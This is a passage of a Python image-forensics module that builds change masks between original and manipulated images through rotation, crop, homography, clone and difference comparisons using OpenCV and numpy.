if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 255
newLevelMask = func(levelMask)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
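# Illustrative sketch (not part of the original module): applyToComposite applies a
# callable to each level of a composite mask independently. The helper below is
# hypothetical and exists only to demonstrate a per-level horizontal flip.
def _example_apply_to_composite():
    composite = np.zeros((4, 4), dtype=np.uint8)
    composite[0, 0] = 1  # level 1 occupies the top-left pixel
    composite[3, 3] = 2  # level 2 occupies the bottom-right pixel
    # each level is expanded to a 255 mask, flipped, and mapped back to its level value
    return applyToComposite(composite, lambda levelMask: np.fliplr(levelMask))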
def applyGridTransformCompositeImage(compositeMask, startIm, destIm, edgeMask=None, arguments={}):
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
arguments = dict(arguments)
if 'homography max matches' in arguments:
arguments.pop('homography max matches')
levels = list(np.unique(compositeMask))
for level in levels:
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 255
newlevelmask = __grid(startIm, destIm, levelMask, edgeMask=255 - edgeMask, arguments=arguments)
if newlevelmask is not None:
newMask[newlevelmask > 100] = level
return newMask
def applyInterpolateToCompositeImage(compositeMask, startIm, destIm, edgeMask, inverse=False, arguments={},
defaultTransform=None,
withMask = False):
"""
Loop through each level and apply a SIFT-derived transform to the mask.
:param compositeMask:
:param startIm:
:param destIm:
:param edgeMask:
:return:
@type destIm: ImageWrapper
@type startIm: ImageWrapper
"""
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
if 'homography' in arguments and arguments['homography'] == 'Map':
return applyGridTransformCompositeImage(compositeMask,
startIm,
destIm,
edgeMask=edgeMask,
arguments=arguments)
if 'homography' in arguments and arguments['homography'] == 'None':
return compositeMask
levels = list(np.unique(compositeMask))
flags = cv2.WARP_INVERSE_MAP if inverse else cv2.INTER_LINEAR
borderValue = 0
for level in levels:
if level == 0:
continue
if defaultTransform is None or (
'composite homography' in arguments and arguments['composite homography'] == 'Multiple'):
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 200
TM, matchCountResult = __sift(startIm, destIm, mask1=levelMask, mask2=invertMask(ImageWrapper(edgeMask)), arguments=arguments)
else:
TM = defaultTransform
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 8000
if TM is None:
newLevelMask = cv2.resize(levelMask, (destIm.size[0], destIm.size[1]))
elif withMask:
newLevelMask = applyTransform(levelMask,
mask=edgeMask,
transform_matrix=TM,
invert=inverse,
shape=(destIm.size[1], destIm.size[0]))
else:
newLevelMask = cv2.warpPerspective(levelMask, TM, (destIm.size[0], destIm.size[1]),
flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=borderValue)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyRotateToCompositeImage(img, angle, pivot):
"""
Loop through each level and apply the rotation about the pivot.
:param img:
:param angle:
:param pivot:
:return:
"""
from functools import partial
func = partial(rotateImage, angle, pivot)
return applyToComposite(img, func, shape=img.shape)
def applyTransformToComposite(compositeMask, mask, transform_matrix, shape=None, returnRaw=False):
"""
Loop through each level and apply the transform, converting each level to a mask before transforming.
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
"""
from functools import partial
func = partial(applyTransform, mask=mask, transform_matrix=transform_matrix, shape=shape, returnRaw=returnRaw)
return applyToComposite(compositeMask, func, shape=shape)
def applyPerspectiveToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpPerspective(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyAffineToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpAffine(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyRotateToComposite(rotation, compositeMask, edgeMask, expectedDims, local=False):
"""
Loop through each level and apply the rotation, converting levels to masks and filling unmapped areas with 255.
:param rotation:
:param compositeMask:
:param edgeMask:
:param expectedDims:
:param local:
:return:
"""
from functools import partial
if local:
func = partial(__localrotateImage, rotation, edgeMask, expectedDims=expectedDims, cval=255)
else:
func = partial(__rotateImage, rotation, expectedDims=expectedDims, cval=255)
return applyToComposite(compositeMask, func, shape=expectedDims)
def isHomographyOk(transform_matrix, h, w):
# convert corners to homogeneous coordinates
ll = np.array([0, 0, 1])
ul = np.array([0, w, 1])
lr = np.array([h, 0, 1])
ur = np.array([h, w, 1])
if transform_matrix.shape == (2,3):
transform_matrix = np.vstack([transform_matrix,[0,0,1.0]])
a_ll = np.matmul(transform_matrix, ll)
a_ul = np.matmul(transform_matrix, ul)
a_ur = np.matmul(transform_matrix, ur)
a_lr = np.matmul(transform_matrix, lr)
# convert points to lines
a = np.cross(a_ll, a_ul)
b = np.cross(a_lr, a_ur)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_vertical = intersection_point_projective[0] / intersection_point_projective[2]
x_vertical = intersection_point_projective[1] / intersection_point_projective[2]
a = np.cross(a_ul, a_ur)
b = np.cross(a_ll, a_lr)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_horizontal = intersection_point_projective[0] / intersection_point_projective[2]
x_horizontal = intersection_point_projective[1] / intersection_point_projective[2]
# if the resulting lines intersect inside the box, fail
return not (0 <= x_vertical <= w and 0 <= y_vertical <= h) and not (
0 <= x_horizontal <= w and 0 <= y_horizontal <= h)
# Or is more appropriate to look at the hull of the shape.
# point = Point(x,y)
# points = [(d[0] / d[2], d[1] / d[2]) for d in [a_ll,a_ul,a_ur,a_lr]]
##polygon = Polygon(points).convex_hull
# return not polygon.contains(point)
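# Illustrative sketch (not part of the original module): isHomographyOk rejects a
# homography whose warped image edges intersect inside the original frame. The matrix
# below is a hypothetical mild perspective transform and is expected to be accepted.
def _example_is_homography_ok():
    h, w = 480, 640
    M = np.array([[1.0, 0.05, 10.0],
                  [0.02, 1.0, 5.0],
                  [1e-6, 2e-6, 1.0]])
    return isHomographyOk(M, h, w)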
def applyTransform(compositeMask, mask=None, transform_matrix=None, invert=False, returnRaw=False, shape=None):
"""
Create a new mask by applying the transform only to those parts of the
compositeMask that overlap the provided mask.
:param compositeMask:
:param mask: 255 for unmanipulated pixels
:param transform_matrix:
:param invert:
:param returnRaw: if True, do not merge the result back into the composite
:return:
"""
flags = cv2.WARP_INVERSE_MAP if invert else cv2.INTER_LINEAR # +cv2.CV_WARP_FILL_OUTLIERS
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
compositeMaskFlipped = compositeMask
# resize only occurs by user error.
if compositeMaskFlipped.shape != maskInverted.shape:
compositeMaskFlipped = cv2.resize(compositeMaskFlipped, (maskInverted.shape[1], maskInverted.shape[0]))
compositeMask = cv2.resize(compositeMask, (maskInverted.shape[1], maskInverted.shape[0]))
if shape is None:
shape = mask.shape
# zeros out areas outside the mask
compositeMaskAltered = compositeMaskFlipped * maskInverted
maxvalue = compositeMaskAltered.max()
compositeMaskAltered[compositeMaskAltered > 0] = maxvalue-20
if transform_matrix.shape[0] == 2:
newMask = cv2.warpAffine(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
newMask = cv2.warpPerspective(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
newMask[newMask > 99] = maxvalue
newMask[newMask < 100] = 0
# put the areas outside the mask back into the composite
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
if returnRaw:
return newMask
newMask = newMask | compositeMask * maskAltered
return newMask
def cropResize(img,location, wh):
img_crop = img[location[0]:wh[0],location[1]:wh[1],:]
return cv2.resize(img_crop, (img.shape[1],img.shape[0]))
def cropResizeCompare(img1, img2, arguments=dict()):
width_and_height = (int(arguments['crop width']), int(arguments['crop height']))
pre_resize_img = cv2.resize(img2, width_and_height)
return composeCropImageMask(img1, pre_resize_img, location=None)
def cropCompare(img1, img2, arguments=dict()):
from maskgen.image_wrap import ImageWrapper
if (sum(img1.shape) > sum(img2.shape)):
img1_m, img2_m = __alignChannels(ImageWrapper(img1), ImageWrapper(img2))
analysis = {'shape change': sizeDiff(ImageWrapper(img1_m), ImageWrapper(img2_m))}
location = getValue(arguments,'location',None)
if type(location) == str:
location = toIntTuple(location)
mask, analysis_d = composeCropImageMask(img1_m, img2_m,location=location)
analysis_d.update(analysis)
return mask, analysis_d
return None, {}
def _composeLCS(img1, img2):
from scipy import sparse
m = img1.shape[0] * img1.shape[1]
n = img2.shape[0] * img2.shape[1]
LCS = sparse.lil_matrix((m + 1, n + 1), dtype=np.int8)
# LCS[i][j] contains the length of the LCS of img1[0..i-1] and img2[0..j-1]
for i in xrange(1, m + 1, 1):
for j in xrange(1, n + 1, 1):
x1 = (i - 1) % img1.shape[0]
y1 = (i - 1) / img1.shape[0]
x2 = (j - 1) % img2.shape[0]
y2 = (j - 1) / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
LCS[i, j] = LCS[i - 1, j - 1] + 1
else:
v = max(LCS[i - 1, j], LCS[i, j - 1])
if v > 0:
LCS[i, j] = v
# Start from the bottom-right corner and, one by one,
# mark matching pixels in the mask
i = m - 1
j = n - 1
mask = np.zeros(img1.shape, dtype=np.uint8)
while i >= 0 and j >= 0:
x1 = i % img1.shape[0]
y1 = i / img1.shape[0]
x2 = j % img2.shape[0]
y2 = j / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
mask[x1, y1] = 255
i -= 1
j -= 1
# If not same, then find the larger of two and
# go in the direction of larger value
elif LCS[i - 1, j] > LCS[i, j - 1]:
i -= 1
else:
j -= 1
return mask
def __search1(pixel, img2, tally, endx, endy, x, y):
from collections import deque
def __addToQueue(x, y, endx, endy, queue):
if x > endx:
queue.append((x - 1, y))
if y > endy:
queue.append((x, y - 1))
if x > endx:
queue.append((x - 1, y - 1))
pixel2 = img2[x, y]
if pixel == pixel2:
return (x, y)
queue = deque()
__addToQueue(x, y, endx, endy, queue)
while len(queue) > 0:
x, y = queue.popleft()
pixel2 = img2[x, y]
if pixel == pixel2:
return x, y
if tally[x, y] == 0:
__addToQueue(x, y, endx, endy, queue)
return None
def __search(pixel, img2, tally, position, depth):
startx = min(max(0, position[0] - depth[0]), img2.shape[0])
starty = min(max(0, position[1] - depth[1]), img2.shape[1])
endx = min(position[0] + depth[0], img2.shape[0]) + 1
endy = min(position[1] + depth[1], img2.shape[1]) + 1
imgbox = img2[startx:endx, starty:endy]
image_positions = zip(*np.where(imgbox == pixel))
if len(image_positions) > 0:
tallybox = tally[startx:endx, starty:endy]
tallypostions = zip(*np.where(tallybox > 0))
if len(tallypostions) > 0:
maxtally = max(tallypostions)
image_positions = [p for p in image_positions if p > maxtally]
else:
return None
if len(image_positions) > 0:
best = min(image_positions)
return startx + best[0], starty + best[1]
return None
def _tallySeam(img1, img2, minDepth=50):
tally1 = np.zeros(img1.shape)
tally2 = np.zeros(img2.shape)
depth_x = max(img2.shape[0] - img1.shape[0], minDepth)
depth_y = max(img2.shape[1] - img1.shape[1], minDepth)
for x1 in range(img1.shape[0]):
for y1 in range(img1.shape[1]):
pos = __search(img1[x1, y1], img2, tally2, (x1, y1), (depth_x, depth_y))
if pos is not None:
tally1[x1, y1] = 1
tally2[pos[0], pos[1]] = 1
return tally1.astype('uint8') * 255
def rotateCompare(img1, img2, arguments=dict()):
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
local = (arguments['local'] == 'yes') if 'local' in arguments else False
if img1.shape == img2.shape:
mask1, analysis1 = __diffMask(img1, img2, False, args=arguments)
if abs(rotation) < 0.0001:
return mask1, analysis1
mask2, analysis2 = __compareRotatedImage(rotation, img1, img2, arguments)
diff = sumMask(mask1) - sumMask(mask2)
return (mask1, analysis1) if diff < 0 or local else (mask2, analysis2)
else:
return __compareRotatedImage(rotation, img1, img2, arguments)
def resizeImage(img1, shape, interpolation):
name_map = {
'bicubic': cv2api.cv2api_delegate.inter_cubic,
'nearest': cv2api.cv2api_delegate.inter_nn,
'bilinear': cv2api.cv2api_delegate.inter_linear,
'cubic': cv2api.cv2api_delegate.inter_cubic,
'mesh': cv2api.cv2api_delegate.inter_area,
'lanczos': cv2api.cv2api_delegate.inter_lanczos
}
inter_val = name_map[interpolation] if interpolation in name_map else cv2api.cv2api_delegate.inter_nn
return cv2.resize(img1, (shape[1], shape[0]), interpolation=inter_val)
def resizeCompare(img1, img2, arguments=dict()):
new_img2 = resizeImage(img2,
img1.shape,
arguments['interpolation'] if 'interpolation' in arguments else 'nearest')
return __diffMask(img1, new_img2, False, args=arguments)
def moving_average(a, n=3):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
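# Illustrative sketch (not part of the original module): moving_average smooths a 1-D
# histogram before local minima are searched (see mediatedCompare below).
def _example_moving_average():
    hist = np.array([0., 4., 8., 4., 0., 2., 6.])
    return moving_average(hist, n=3)  # result has len(hist) - 2 entries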
def morphologyCompare(img_one, img_two, arguments= {}):
kernel_size = int(getValue(arguments, 'kernel', 3))
kernel = np.ones((kernel_size, kernel_size), np.uint8)
diff = (np.abs(img_one - img_two)).astype('uint16')
mask = np.sum(diff, 2)
difference = float(arguments['tolerance']) if arguments is not None and 'tolerance' in arguments else 0.00390625
difference = difference * 256
mask[np.where(mask < difference)] = 0
if getValue(arguments, 'distribute_difference', False):
mask = 255*mask.astype(np.double)/(np.max(mask)-difference)
mask = mask.astype('uint8')
else:
# set remaining above-threshold differences to white
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
mask = cv2.morphologyEx(mask,cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)# filter out noise in the mask
return mask, {}
def mediatedCompare(img_one, img_two, arguments={}):
morphologyOps = {'open':cv2.MORPH_OPEN, 'close':cv2.MORPH_CLOSE}
morphology_order = getValue(arguments, 'morphology order', 'open:close').split(':')
gain = int(getValue(arguments, 'gain', 0))
kernel_size=int(getValue(arguments, 'kernel',3))
weight = int(getValue(arguments, 'weight', 1.0))
smoothing = int(getValue(arguments, 'smoothing', 3))
algorithm = getValue(arguments, 'filling', 'morphology')
aggregate = getValue(arguments, 'aggregate', 'max')
kernel = np.ones((kernel_size, kernel_size), np.uint8)
max_threshold = int(getValue(arguments, 'maximum threshold', 255))
from scipy import signal
# compute diff in 3 colors
if aggregate == 'luminance':
min_threshold = int(getValue(arguments, 'minimum threshold', 3))
img_one = cv2.cvtColor(img_one.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
img_two = cv2.cvtColor(img_two.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16')))
mask = diff[:, :, 0] + (diff[:, :, 2] + diff[:, :, 1])/weight
bins = 256 + 512/weight
else:
min_threshold = int(getValue(arguments, 'minimum threshold', 0))
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16'))).astype('uint16')
if aggregate == 'max':
mask = np.max(diff, 2) # use the biggest difference of the 3 colors
bins=256
elif aggregate == 'sum':
mask = np.sum(diff, 2)
bins=768
else:
mask = np.mean(diff, 2)
bins = 256
hist, bin_edges = np.histogram(mask, bins=bins, density=False)
if smoothing > 0:
hist = moving_average(hist,n=smoothing) # smooth out the histogram
minima = signal.argrelmin(hist, order=1) # find local minima
size = minima[0].size
minima = minima[0][0] if size > 0 else 0
else:
size = 0
minima = min_threshold
if size == 0 or minima > bins/2: # if there is no usable minimum, fall back to the minimum threshold
threshold = min_threshold
else:
threshold = max(min_threshold,min(minima, max_threshold)) # Use first minima
threshold += gain
mask[np.where(mask <= threshold)] = 0 # set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
if algorithm == 'morphology':
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[0]], kernel)
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[1]], kernel)
elif algorithm == 'median':
mask = cv2.medianBlur(mask, kernel_size) # filter out noise in the mask
return mask, {'threshold': threshold, 'hist': hist, 'diff':diff}
def getExifDimensionsFromData(exif_meta, crop=False):
heights = ['Cropped Image Height', 'AF Image Height', 'Image Height', 'Exif Image Height', ] if crop else [
'Image Height', 'Exif Image Height']
widths = ['Cropped Image Width', 'AF Image Width', 'Image Width', 'Exif Image Width', ] if crop else ['Image Width',
'Exif Image Width']
height_selections = [(exif_meta[h] if h in exif_meta else None) for h in heights]
width_selections = [(exif_meta[w] if w in exif_meta else None) for w in widths]
if 'png:IHDR.width,height' in exif_meta:
try:
w, h = [int(x.strip()) for x in exif_meta['png:IHDR.width,height'].split(',')]
height_selections.append(h)
width_selections.append(w)
except:
pass
return [(int(height_selections[p]), int(width_selections[p]))
for p in range(len(width_selections)) if
height_selections[p] is not None and width_selections[p] is not None]
def getExifDimensions(filename, crop=False):
from maskgen import exif
return getExifDimensionsFromData(exif.getexif(filename), crop=crop)
def convertCompare(img1, img2, arguments=dict()):
analysis = {}
if 'Image Rotated' in arguments and arguments['Image Rotated'] == 'yes':
if 'source filename' in arguments:
orientation = exif.getOrientationFromExif(arguments['source filename'])
analysis.update(exif.rotateAnalysis(orientation))
img1 = exif.rotateAccordingToExif(img1, orientation, counter=True)
else:
# assumes crop, but this approach should be improved to use HOG comparisons
# since some of these conversions occur with Raw images
rotation, mask = __findRotation(img1, img2, [0, 90, 180, 270])
analysis.update({'rotation': rotation})
return 255 - mask, analysis
if 'source filename' in arguments and img1.shape != img2.shape:
# see if there is crop information in exif
dims_crop = getExifDimensions(arguments['source filename'], crop=True)
dims = getExifDimensions(arguments['source filename'], crop=False)
if len(dims_crop) > 0 and len(dims) > 0 and dims_crop[0] != dims[0]:
analysis['Crop'] = 'yes'
if img1.shape != img2.shape:
diff_shape = (int(img1.shape[0] - img2.shape[0]) / 2, int(img1.shape[1] - img2.shape[1]) / 2)
#keep in mind that alterMask, used for composite generation, assumes 'crop' occurs first, followed
# by final adjustments for size
if 'location' not in arguments:
diff_shape= (max(1,diff_shape[0]),max(1,diff_shape[1]))
else:
diff_shape = toIntTuple(arguments['location'])
if getValue(arguments, 'Crop','yes') == 'no':
new_img1 = img1
else:
new_img1 = img1[diff_shape[0]:-diff_shape[0], diff_shape[1]:-diff_shape[1]]
new_img2 = cv2.resize(img2, (new_img1.shape[1], new_img1.shape[0]))
if getValue(arguments, 'Crop', 'yes') == 'yes':
analysis['location'] = str(diff_shape)
mask, a = __diffMask(new_img1, new_img2, False, args=arguments)
else:
mask, a = __diffMask(img1, img2, False, args=arguments)
analysis.update(a)
return mask, analysis
def __composeMask(img1_wrapper, img2_wrapper, invert, arguments=dict(), alternativeFunction=None, convertFunction=None):
"""
:param img1:
:param img2:
:param invert:
:param arguments:
:param alternativeFunction:
:param convertFunction:
:return:
@type img1_wrapper: ImageWrapper
@type img2_wrapper: ImageWrapper
@type arguments: dict
@rtype numpy.ndarray,dict
"""
img1, img2 = __alignChannels(img1_wrapper,
img2_wrapper,
convertFunction=convertFunction)
args = {}
args.update(arguments)
args['source filename'] = img1_wrapper.filename
args['target filename'] = img2_wrapper.filename
if alternativeFunction is not None:
try:
mask, analysis = alternativeFunction(img1, img2, arguments=args)
removeValue(analysis, 'arguments.source filename')
removeValue(analysis, 'arguments.target filename')
if mask is not None:
return mask if not invert else 255 - mask, analysis, None
except ValueError as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, str(e)
# rotate image two if possible to compare back to image one.
# The mask is not perfect.
mask = None
error = None
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
analysis = {}
if abs(rotation) > 0.0001:
mask, analysis = __compareRotatedImage(rotation, img1, img2, arguments)
if sum(img1.shape) > sum(img2.shape):
mask, analysis = composeCropImageMask(img1, img2)
if sum(img1.shape) < sum(img2.shape):
mask, analysis = __composeExpandImageMask(img1, img2)
if mask is None:
try:
if img1.shape != img2.shape and \
img1.shape[1] == img2.shape[0] and \
img1.shape[0] == img2.shape[1]:
arguments['Image Rotated'] = 'yes'
mask, analysis = convertCompare(img1, img2, arguments)
else:
mask, analysis = __diffMask(img1, img2, False, args=arguments)
except Exception as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, error
def __alignShape(im, shape):
x = min(shape[0], im.shape[0])
y = min(shape[1], im.shape[1])
z = np.zeros(shape)
for d in range(min(shape[2], im.shape[2])):
z[0:x, 0:y, d] = im[0:x, 0:y, d]
return z
def __resize(img, dimensions):
if img.shape[0] != dimensions[0]:
diff = abs(img.shape[0] - dimensions[0])
img = np.concatenate((np.zeros((diff / 2, img.shape[1])), img), axis=0)
img = np.concatenate((img, np.zeros((diff - (diff / 2), img.shape[1]))), axis=0)
if img.shape[1] != dimensions[1]:
diff = abs(img.shape[1] - dimensions[1])
img = np.concatenate((np.zeros((img.shape[0], diff / 2)), img), axis=1)
img = np.concatenate((img, np.zeros((img.shape[0], diff - (diff / 2)))), axis=1)
return img
def rotateImage(angle, pivot, img):
padX = [img.shape[1] - pivot[1], pivot[1]]
padY = [img.shape[0] - pivot[0], pivot[0]]
imgP = np.pad(img, [padY, padX], 'constant')
if abs(angle) % 90 == 0:
imgR = np.rot90(imgP, int(angle / 90)).astype('uint8')
else:
try:
imgR = np.asarray(Image.fromarray(imgP).rotate(angle))
except:
imgR = ndimage.rotate(imgP, angle, cval=0, reshape=False, mode='constant').astype('uint8')
return imgR[padY[0]: -padY[1], padX[0]: -padX[1]]
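# Illustrative sketch (not part of the original module): rotateImage pads the image so
# the (row, col) pivot becomes the center, rotates, and crops back to the original shape.
def _example_rotate_image():
    img = np.zeros((100, 200), dtype=np.uint8)
    img[40:60, 90:110] = 255
    rotated = rotateImage(15.0, (50, 100), img)
    return rotated.shape == img.shape  # the original shape is preserved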
def __localrotateImage(rotation, mask, img, expectedDims=None, cval=0):
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
targetDims = img.shape
if expectedDims is not None:
targetDims = expectedDims
x0,y0,w,h = widthandheight(maskInverted)
if w == 0 or h == 0:
return img
h = min(h+1, targetDims[0])
w = min(w+1, targetDims[1])
subImg = img[y0:(y0+h),x0:(x0+w)]
center = (h /2, w / 2)
M = cv2.getRotationMatrix2D(center, rotation, 1.0)
rotatedSubMask = cv2.warpAffine(subImg*maskInverted[y0:(y0+h),x0:(x0+w)], M, (w,h),flags=cv2api.cv2api_delegate.inter_linear)
rotatedMask = np.zeros(mask.shape)
rotatedMask[y0:y0+h,x0:x0+w] = rotatedSubMask
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
return (rotatedMask + img * maskAltered).astype('uint8')
def __rotateImage(rotation, img, expectedDims=None, cval=0):
expectedDims = expectedDims if expectedDims is not None else (img.shape[0], img.shape[1])
rotNorm = int(rotation / 90) if (rotation % 90) == 0 else None
rotNorm = rotNorm if rotNorm is None or rotNorm >= 0 else (4 + rotNorm)
npRotation = rotNorm is not None and img.shape == (expectedDims[1], expectedDims[0])
if npRotation:
res = np.rot90(img, rotNorm)
else:
res = ndimage.interpolation.rotate(img, rotation, cval=cval, reshape=(img.shape != expectedDims), order=0)
if (res.shape[0],res.shape[1]) != expectedDims:
res = cv2.resize(res,(expectedDims[1],expectedDims[0]))
return res
def __compareRotatedImage(rotation, img1, img2, arguments):
if rotation != 0:
res = __rotateImage(rotation, img1, expectedDims=img2.shape, cval=img2[0, 0])
else:
res = img1
mask, analysis = __composeExpandImageMask(res, img2) if res.shape != img2.shape else __diffMask(res,
img2,
False,
args=arguments)
if rotation != 0:
res = __rotateImage(-rotation, mask, expectedDims=img1.shape, cval=255)
else:
res = mask
return res, analysis
def __findRotation(img1, img2, range):
best = 0
r = None
best_mask = None
for rotation in range:
res, analysis = __compareRotatedImage(rotation, img1, img2, {})
c = np.sum(res)
if c > best or best_mask is None:
best = c
best_mask = res
r = rotation
return r, best_mask
# res = __resize(mask,(max(img2.shape[0],img1.shape[0]), max(img2.shape[1],img1.shape[1])))
# res[res<0.00001] = 0
# res[res>0] = 255
# # now crop out the rotation difference, to make sure the original image is not modified
# if img1.shape != res.shape:
# diff = (res.shape[0]-img1.shape[0], res.shape[1]-img1.shape[1])
# diff = (diff[0] if diff[0] > 0 else 0, diff[1] if diff[1] > 0 else 0)
# res = res[diff[0]/2:res.shape[0]-((diff[0]/2) -diff[0]),diff[1]/2:res.shape[1]-((diff[1]/2) - diff[1])]
def extractAlpha(rawimg1, rawimg2):
"""
If rawimg2 has an alpha channel, pixels with a high alpha value are treated as the pixels that did not change.
:param rawimg1:
:param rawimg2:
:return:
"""
img2_array = rawimg2.to_array()
img1_array = rawimg1.to_array()
ii16 = np.iinfo(np.uint16)
if len(img2_array.shape) == 3 and img2_array.shape[2] == 4:
img2_array = img2_array[:, :, 3]
if len(img2_array.shape) == 2:
all = np.zeros((img2_array.shape[0], img2_array.shape[1])).astype('uint16')
all[img2_array == 0] = ii16.max
return np.zeros((img1_array.shape[0], img1_array.shape[1])).astype('uint16'), all
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def convert16bitcolor(rawimg1, rawimg2):
return rawimg1.to_array().astype('int16'), rawimg2.to_array().astype('int16')
def __alignChannels(rawimg1, rawimg2, convertFunction=None):
"""
:param rawimg1:
:param rawimg2:
:param equalize_colors:
:return:
@type rawimg1: ImageWrapper
@type rawimg2: ImageWrapper
"""
if convertFunction is not None:
return convertFunction(rawimg1, rawimg2)
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def __findBestMatch(big, small):
""" Return a tuple describing the bounding box (xl,xh,yl,yh) with the most
likely match to the small image.
"""
if len(small.shape) == 3 and len(big.shape) == 3 and \
small.shape[2] == 4 and big.shape[2] == 3:
newsmall = np.zeros((small.shape[0], small.shape[1], 3))
newsmall[:, :, :] = small[:, :, 0:3]
small = newsmall
if np.any(np.asarray([(x[1] - x[0]) for x in zip(small.shape, big.shape)]) < 0):
return None
result = cv2.matchTemplate(big.astype('float32'), small.astype('float32'), cv2api.cv2api_delegate.tm_sqdiff_normed)
mn, _, mnLoc, _ = cv2.minMaxLoc(result)
result_tuple = (mnLoc[1], mnLoc[0], mnLoc[1] + small.shape[0], mnLoc[0] + small.shape[1])
if result_tuple[2] > big.shape[0] or result_tuple[3] > big.shape[1]:
return None
return result_tuple
def bm(X, patch):
from sklearn.metrics import mean_absolute_error
bv = 999999.0
bp = (0, 0)
for i in range(X.shape[0] - patch.shape[0]):
for j in range(X.shape[1] - patch.shape[1]):
v = mean_absolute_error(X[i:i + patch.shape[0], j:j + patch.shape[1]], patch)
if v < bv:
bv = v
bp = (i, j)
return bp, bv
def composeCropImageMask(img1, img2, location=None):
""" Return a masking where img1 is bigger than img2 and
img2 is likely a crop of img1.
images are 16 bit unnsigned or floating point.
@return change mask aligned to in img1 dimensions, dictionary of analysis keys
@type img1: np.array
@type img2: np.array
"""
analysis = {}
analysis['location'] = '(0,0)'
if location is not None:
matched_tuple = (location[0],location[1],img2.shape[0]+location[0],img2.shape[1]+location[1])
else:
matched_tuple = __findBestMatch(img1, img2)
if matched_tuple is not None:
diffIm = np.zeros(img1.shape).astype(img1.dtype)
diffIm[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = img2
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
dst = np.abs(img1 - diffIm)
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def composeCloneMask(changemask, startimage, finalimage):
"""
:param changemask:
:param startimage:
:param finalimage:
:return:
@type changemask: ImageWrapper
@type startimage: ImageWrapper
@type finalimage: ImageWrapper
"""
mask = np.asarray(changemask.invert())
start_image_array = np.array(startimage)
final_image_array = np.array(finalimage)
newmask = np.zeros(start_image_array.shape).astype('uint8')
try:
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
try:
cnt = contours[i]
x, y, w, h = cv2.boundingRect(cnt)
if w <= 2 or h <= 2:
continue
final_image_subarray = final_image_array[y:y + h, x:x + w]
for i in range(final_image_subarray.shape[2]):
final_image_subarray[:, :, i] = final_image_subarray[:, :, i] * (mask[y:y + h, x:x + w] / 255)
matched_tuple = __findBestMatch(start_image_array, final_image_subarray)
if matched_tuple is not None:
newmask[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = 255
except Exception as e:
logging.getLogger('maskgen').warning('Failed to compose clone mask: ' + str(e))
continue
except Exception as e:
return changemask.to_array()
return newmask
def __composeExpandImageMask(img1, img2):
""" Return a masking where img1 is smaller than img2 and
img2 contains img1.
"""
